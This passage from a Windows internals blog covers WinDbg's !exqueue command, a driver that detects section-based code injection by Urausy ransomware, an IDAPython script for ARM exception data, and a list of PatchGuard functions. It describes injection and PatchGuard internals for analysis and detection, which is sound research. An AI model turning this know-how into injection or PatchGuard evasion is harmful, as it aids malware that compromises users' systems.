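Passing the reader in as a function keeps the walk independent of where the memory comes from, so a debugger script could supply its own reader instead of the fake dictionary.<br />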
<br />
The !exqueue command shows the contents of the lists as well as the associated worker threads referenced by the ThreadListHead field.<br />
<br />
All you can do, I can do :) I wrote a driver that dumps all items in each work queue to confirm that the above analysis was correct. Note that because this driver is just a PoC, it works only on the 64-bit versions of Windows 8.1 and Windows 10.<br />
<br />
<a href="https://github.com/tandasat/ListWorkItems">https://github.com/tandasat/ListWorkItems</a><br />
<br />
<h3>
Conclusion</h3>
Analyzing WinDbg commands often gives you a good understanding of the Windows kernel with less effort than analyzing the kernel file. Even if you do not find a helpful command at a glance, there may be an undocumented command that you can reverse engineer to unveil Windows internals.<br />
<br />
<h4>
Side Notes</h4>
<ol>
<li>It seems that !exqueue used to be documented and was later dropped for some reason. I found a description of it in a help file that came with WinDbg version 6.11.001.404.</li>
<li>The ExWorkQueues field in _ENODE also holds pointers to the WorkPriQueue structures. It is likely that the structures are allocated for each processor but only the one associated with processor 0 is actually used. </li>
<li>Apparently, an item does not go to the queue if any worker thread is in a wait state (i.e., waiting for an item) when the item is being queued. I guess that in this case the item is handed directly to a thread without being stored in the queue, for performance. For this reason, the command does not show the first item when multiple items are queued at once. </li>
</ol>
<h2>Section Based Code Injection and Its Detection</h2>
Satoshi Tanda, 2015-03-07<br />
<br />
<h4>
Summary</h4>
I wrote <a href="https://github.com/tandasat/RemoteWriteMonitor" target="_blank">a small tool</a> to detect possible code injection even when it is done using only section APIs.<br />
<br />
----<br />
<br />
A few weeks ago, I had an opportunity to analyze ransomware referred to as Urausy. At the very early stage of the analysis, its behaviour did not seem surprising to me; it injected code into explorer.exe, and the injected code spawned svchost.exe hosting malicious code and initiated the main ransom activities (a more detailed analysis can be found on the <a href="https://blog.avast.com/2013/07/24/urausy-lockscreen-your-computer-will-remain-locked-for-3-days-11-hours-and-20-minutes/" target="_blank">avast! blog</a>).<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxjrjbdKGgetc-hukrTotzbtXCStuAlZHeyFdHLkDmlZ4ru-rYkbTQU0UAD5dEOd4ARV723hHpa-nhI7dupCuZjwAi0rv66KeF_to5mSEVtRimJ74EZGpujyOivNfm_ZujhpaZbQvzCC4/s1600/ProcessTree.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxjrjbdKGgetc-hukrTotzbtXCStuAlZHeyFdHLkDmlZ4ru-rYkbTQU0UAD5dEOd4ARV723hHpa-nhI7dupCuZjwAi0rv66KeF_to5mSEVtRimJ74EZGpujyOivNfm_ZujhpaZbQvzCC4/s1600/ProcessTree.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 1: Process Tree </td></tr>
</tbody></table>
I expected that the sample was injecting code using VirtualAllocEx() and CreateRemoteThread(), or related APIs such as NtWriteVirtualMemory() and NtCreateThread/Ex(). Through analysis, however, I noticed that it used none of them for the injection and used section APIs instead. The malware replaced the existing ntdll image in explorer.exe with a newly created section containing an inline hook on NtClose() and code responsible for starting svchost.exe. The output of VMMap indicates that the ntdll image no longer exists and has been replaced with a shared Executable/Readable/Writable section after this injection.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXBRrEio-HXWcwF-m48aA3e9HJA_1fFZXV0A1TyOP6Jmh-BolcKr86PtXdUcCk_vNmG83ppejVQ8CWz_9EX7-MRfr-6nc4FU4d9iGitgV1qZujwDc65YZO0-c7dnd-q2sDpfNXxNeFWnw/s1600/VMMapBefore.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXBRrEio-HXWcwF-m48aA3e9HJA_1fFZXV0A1TyOP6Jmh-BolcKr86PtXdUcCk_vNmG83ppejVQ8CWz_9EX7-MRfr-6nc4FU4d9iGitgV1qZujwDc65YZO0-c7dnd-q2sDpfNXxNeFWnw/s1600/VMMapBefore.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 2: Memory Map of Explorer.exe (Before Infection)</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie1FrxwW1ImQBDJNedlPW7zg-_6ObnCVrpHfIMyHSy3Bexylfqx463FEyssOPgMPzueLJZDE9ixGiTFFWyVEPNyPedDpZXPb4wOZhGl7AvH3bL3kq4MjoqI8KlIgKfU2U_ag9YcvyF5qw/s1600/VMMapAfter.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie1FrxwW1ImQBDJNedlPW7zg-_6ObnCVrpHfIMyHSy3Bexylfqx463FEyssOPgMPzueLJZDE9ixGiTFFWyVEPNyPedDpZXPb4wOZhGl7AvH3bL3kq4MjoqI8KlIgKfU2U_ag9YcvyF5qw/s1600/VMMapAfter.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 3: Memory Map of Explorer.exe (After Infection) </td></tr>
</tbody></table>
Then I started to wonder: what if explorer.exe had not done anything obvious that I could easily spot, and the sample had done many other bad things besides the injection in meaningful ways (i.e., non-junk operations)? I could have missed the injected code.<br />
<br />
The same is true of traditional code injection with VirtualAllocEx() and CreateRemoteThread(), but we are less likely to overlook it because we always expect these APIs to be used for injection and have tools or systems that report typical thread injection.<br />
<br />
So I wrote a driver, <a href="https://github.com/tandasat/RemoteWriteMonitor" target="_blank">RemoteWriteMonitor</a>, which monitors inter-process memory modification by hooking NtWriteVirtualMemory() and ZwMapViewOfSection() to help analysts find this section-based injection. This tool should report all possible code injections because, if you want to execute your own code in another process from user mode, you need to either (1) write something into the other process using those APIs (as far as I can think of), or (2) use a DLL file in conjunction with SetWindowsHookEx() or another type of injection mechanism, which is very easy to find because it is preceded by a disk write operation.<br />
<br />
Let us see what it does with another Urausy sample I found on <a href="https://malwr.com/analysis/MzJjYzNjNDM1Y2QxNDNjNWE4MjQ5NWIwOTc5MWQ5MDc/" target="_blank">Malwr</a>. If you install the driver and run the sample, you will see that the sample maps sections into explorer.exe using ZwMapViewOfSection().<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisyp3DZVkjfsTPh0OWqEY2U7LkL_mpTYpuuwdKoD4ev3cWjP10qcBVOV2nrjknnek5hOlPbB8mZKabCCbZmw_UvcQRTWAhthn5qHbkzRUtih3kccbHddauqbDT4_3iR6pSK3gJ7yxRYjI/s1600/DbgView+(2).png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisyp3DZVkjfsTPh0OWqEY2U7LkL_mpTYpuuwdKoD4ev3cWjP10qcBVOV2nrjknnek5hOlPbB8mZKabCCbZmw_UvcQRTWAhthn5qHbkzRUtih3kccbHddauqbDT4_3iR6pSK3gJ7yxRYjI/s1600/DbgView+(2).png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 4: Output on DebugView<br />
<br /></td></tr>
</tbody></table>
<br />
<br />
<br />
This tool also saves the contents of memory being written as &lt;SHA1&gt;.bin so that you can examine them later. In this example, the written data was code and a PE image, respectively.<br />
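<br />
As a rough illustration of this naming scheme, the following Python sketch derives a file name from the SHA-1 of a written buffer. It is only a user-mode analogy: the actual tool is a kernel driver, and the function names dump_file_name and save_written_data, as well as the lowercase hex format, are assumptions made for this example rather than details taken from RemoteWriteMonitor.<br />
<br />
```python
import hashlib
import os


def dump_file_name(written_data: bytes) -> str:
    """Name a dump after the SHA-1 of its contents (hypothetical helper)."""
    return hashlib.sha1(written_data).hexdigest() + ".bin"


def save_written_data(written_data: bytes, directory: str) -> str:
    """Save a buffer under its content-derived name and return the path.

    Identical buffers map to the same name, so a repeated write of the
    same data does not create a second file.
    """
    path = os.path.join(directory, dump_file_name(written_data))
    if not os.path.exists(path):
        with open(path, "wb") as dump:
            dump.write(written_data)
    return path
```
<br />
Naming dumps after their hash also makes it easy to look up a sample elsewhere by the same value.<br />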
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1vBQa3N6Tv_DyNraFgqm3GswUAd9ZpO3Z8AEUMOrPwAj432QLhadccggJyqSU8KMlcUdFJqFlpzY2agaKXdvmZDUT3m2BK8OoAXrL6o3RxnQSKv63rFWetmjnoNWmGXdDBWEEhwSrp1o/s1600/Contents.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1vBQa3N6Tv_DyNraFgqm3GswUAd9ZpO3Z8AEUMOrPwAj432QLhadccggJyqSU8KMlcUdFJqFlpzY2agaKXdvmZDUT3m2BK8OoAXrL6o3RxnQSKv63rFWetmjnoNWmGXdDBWEEhwSrp1o/s1600/Contents.png" height="528" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 5: File Contents (code at the top, PE image at the bottom)</td></tr>
</tbody></table>
This tool is more of a PoC and does not have rich functionality, but I hope it helps you understand this uncommon injection method and its detection.<br />
<h2>ARM Exception Handling and an IDAPython Script</h2>
Satoshi Tanda, 2015-01-26<br />
<br />
<div class="p1">
<span class="s1">Windows RT differs in several respects, and its implementation of SEH is one of them. </span>To sort out my understanding of ARM exception handling, I wrote an <a href="https://github.com/tandasat/scripts_for_RE/blob/master/parse_ARM_SEH.py" target="_blank">IDAPython script</a> that interprets SEH information in a Windows RT PE file and applies it to an IDB. Here is an example of how this script helps you (I use one of the PatchGuard routines that uses SEH to obfuscate its code flow):</div>
<div class="p2">
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7KquAIakAjPyGrsc-tt8XQOy1iXXmcme_sGEz8vLsahv2OmE1Q9z98dv0dNQYOOF_xt_K0EJvbHqAQow-uqk6zWnO-prf1x9b6TYaP2R68HrIurlpxMTGvKpeleWXUhO5B7LHrFmUONI/s1600/before.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto; text-align: left;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7KquAIakAjPyGrsc-tt8XQOy1iXXmcme_sGEz8vLsahv2OmE1Q9z98dv0dNQYOOF_xt_K0EJvbHqAQow-uqk6zWnO-prf1x9b6TYaP2R68HrIurlpxMTGvKpeleWXUhO5B7LHrFmUONI/s1600/before.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image1: Before Use (plain output of IDA)</td></tr>
</tbody></table>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvO0yOeTUTZMKKNbLV8580qUEO8x4NA9aA_k3tOXUrmPCgCcqUUrG92_TVWaI58wRDOnM0qiLPGrAIS4t92y-OslI28AJWe2MUGUvMtciG419MnvgwExLkHE81AxhWXPehMwO9Zh84w6s/s1600/after.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvO0yOeTUTZMKKNbLV8580qUEO8x4NA9aA_k3tOXUrmPCgCcqUUrG92_TVWaI58wRDOnM0qiLPGrAIS4t92y-OslI28AJWe2MUGUvMtciG419MnvgwExLkHE81AxhWXPehMwO9Zh84w6s/s1600/after.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image2: After Use</td></tr>
</tbody></table>
In Image2, the comments show that there is a __try/__except block around a call to __rt_sdiv().<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhceJ5hpaPlxlJQDPqszSgkHOXI_dWwkzw5-48QvLxJNewWGga7Am9shh8P2KRFvAE1nsK5pTw18iRdBH4BY_0AcyDmdtdOUct_CN1_-4HOx80vju80GLuCzA-Ge3HHi-E_RDgvR0OGoCs/s1600/after2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhceJ5hpaPlxlJQDPqszSgkHOXI_dWwkzw5-48QvLxJNewWGga7Am9shh8P2KRFvAE1nsK5pTw18iRdBH4BY_0AcyDmdtdOUct_CN1_-4HOx80vju80GLuCzA-Ge3HHi-E_RDgvR0OGoCs/s1600/after2.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image3: Exception Filter</td></tr>
</tbody></table>
<span class="s1"></span>If you look at the location of the exception filter, you will find that it calls another interesting-looking function, which is actually part of the authentic PatchGuard code flow. You could miss this path if you were just looking at the plain output of IDA, as in Image1. The script helps you notice the existence of SEH handlers.</div>
<br />
<div class="p1">
<span class="s1">I do not explain the internals of ARM exception handling here, as the explanation on MSDN[1] is detailed enough to understand them, but in short, they are fairly similar to those on x64. For instance, each function in a file is described by a RUNTIME_FUNCTION structure located in the .pdata section, and the structure points to an .xdata record that contains a SCOPE_TABLE structure and an array of its entries describing the ranges of __try blocks</span> and the addresses of the except filters and body blocks (or finally blocks). This is essentially the same design as on x64. </div>
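<div class="p1">
To make the .pdata layout a little more concrete, here is a minimal Python sketch that splits a raw ARM .pdata section into its 8-byte records. It assumes the record layout described in the MSDN article[1]: a 32-bit function start RVA followed by a 32-bit word whose low two bits are a flag, where a flag of 0 means the word is the RVA of an .xdata record and any other value means packed unwind data. The function name and the dictionary keys are made up for this example, and the code is not taken from the IDAPython script.</div>

```python
import struct

PDATA_RECORD_SIZE = 8  # two little-endian 32-bit words per function


def parse_arm_pdata(pdata: bytes):
    """Split raw .pdata bytes into records (illustrative helper).

    Each record yields the function start RVA and either the RVA of its
    .xdata record (flag == 0) or the raw packed unwind word (flag != 0).
    """
    records = []
    usable = len(pdata) - len(pdata) % PDATA_RECORD_SIZE  # ignore a trailing partial record
    for offset in range(0, usable, PDATA_RECORD_SIZE):
        begin_rva, unwind_word = struct.unpack_from("<II", pdata, offset)
        flag = unwind_word & 0x3
        records.append({
            "begin_rva": begin_rva,
            "xdata_rva": unwind_word if flag == 0 else None,
            "packed_unwind_data": unwind_word if flag != 0 else None,
        })
    return records
```

<div class="p1">
Only records with an .xdata RVA can lead to a SCOPE_TABLE, so a tool interested in __try blocks could skip the packed ones.</div>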
<div class="p1">
<span class="s1"><br /></span></div>
<div class="p1">
<span class="s1">As a note, I have listed some references below that may complement your understanding of ARM exception handling[2][3][4][5]. I hope you enjoy them and my script too. </span><br />
<br />
<ol>
<li><a href="https://msdn.microsoft.com/en-us/library/dn743843.aspx" target="_blank">ARM Exception Handling</a></li>
<li><a href="http://vrt-blog.snort.org/2014/06/exceptional-behavior-windows-81-x64-seh.html" target="_blank">Exceptional behavior: the Windows 8.1 X64 SEH Implementation</a><br />Besides the article itself, the references listed at its top are all exceptionally good.</li>
<li><a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms680597%28v=vs.85%29.aspx" target="_blank">RtlLookupFunctionEntry function</a><br />Returns a corresponding .pdata entry for a given address.</li>
<li><a href="https://msdn.microsoft.com/en-us/library/windows/hardware/ff563104(v=vs.85).aspx" target="_blank">.fnent (Display Function Data)</a><br />You can dump .pdata/.xdata information with it.</li>
<li><a href="http://blogs.norman.com/2011/for-consumption/improving-ida-analysis-of-x64-exception-handling" target="_blank">Improving IDA Analysis of x64 Exception Handling</a><br />An x64 version of my script. Very handy.</li>
</ol>
</div>
<h2>A List of PatchGuard v8.1 Related Functions on x64 and ARM</h2>
Satoshi Tanda, 2015-01-21<br />
<br />
I spent the last two months analyzing PatchGuard on Windows RT 8.1 (which runs on ARM) and finished that work recently. The analysis turned out to be a lot easier than I expected, mostly because PatchGuard's code is written in C and has almost the same structure on ARM as on x64, which I had already analyzed.<br />
<br />
In order to look at PatchGuard on Windows RT 8.1, almost all I had to do was identify PatchGuard related functions and map them to the corresponding functions on x64.<br />
<br />
Here is a table showing that mapping (functions whose names differ between the platforms are highlighted).<br />
<br />
<table border="0" cellspacing="0" cols="2" frame="VOID" rules="NONE">
<colgroup><col width="317"></col><col width="383"></col></colgroup>
<tbody>
<tr>
<td align="CENTER" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;" width="317"><b>x64</b></td>
<td align="CENTER" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;" width="383"><b>ARM</b></td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CcAdjustBcbDepth</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CcUnmapBehindLazyReader</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CcBcbProfiler</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CcDelayedFlushTimer</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CcInitializeBcbProfiler</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CcPrepareDelayedFlushTimers</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CmpAppendDllSection</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExpWnfAcquireNameInstanceShared</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CmpEnableLazyFlushDpcRoutine</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CmpEnableLazyFlushDpcRoutine</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CmpLazyFlushDpcRoutine</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CmpLazyFlushDpcRoutine</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">DeferredRoutine</td>
<td align="CENTER" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">&lt;NoSymbol&gt;</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExInitSystemPhase2</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExInitSystemPhase2</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExpCenturyDpcRoutine</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExpCenturyDpcRoutine</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExpTimerDpcRoutine</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExpTimerDpcRoutine</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExpTimeRefreshDpcRoutine</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExpTimeRefreshDpcRoutine</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExpTimeZoneDpcRoutine</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExpTimeZoneDpcRoutine</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">FsRtlMdlReadCompleteDevEx</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">RtlpExecuteHandlerForUnwind_xdata_compact</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">FsRtlUninitializeSmallMcb</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">ExpPrefetchPushLock</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">IopTimerDispatch</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">IopTimerDispatch</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KeCompactServiceTable</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KeCompactServiceTable</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KeInitAmd64SpecificState</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KeArmDiscoverCacheTopology</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiBalanceSetManagerDeferredRoutine</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiBalanceSetManagerDeferredRoutine</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiDispatchCallout</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">CcDelayedFlushTimer</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiDpcDispatch</td>
<td align="CENTER" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">&lt;NoSymbol&gt;</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiFastGetCallersAddress </td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiFastGetCallersAddress </td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiFatalExceptionFilter</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiFatalExceptionFilter</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiFilterFiberContext</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiArmDiscoverCacheTopology</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiGetGdtIdt </td>
<td align="CENTER" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">&lt;NoSymbol&gt;</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiLockExtendedServiceTable</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiLockExtendedServiceTable</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiLockServiceTable</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiLockServiceTable</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiMcaDeferredRecoveryService</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiInitializeExternalCacheController</td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiScbQueueScanWorker</td>
<td align="LEFT" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">PopPdcSampleIdleTimeouts</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiServiceTablesLocked </td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiServiceTablesLocked </td>
</tr>
<tr>
<td align="LEFT" bgcolor="#FFFF99" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">KiTimerDispatch</td>
<td align="CENTER" bgcolor="#FFFF99" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><NoSymbol></td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">PopPoCoalescinCallback</td>
<td align="LEFT" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">PopPoCoalescinCallback</td>
</tr>
<tr>
<td align="LEFT" height="22" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">PopThermalZoneDpc</td>
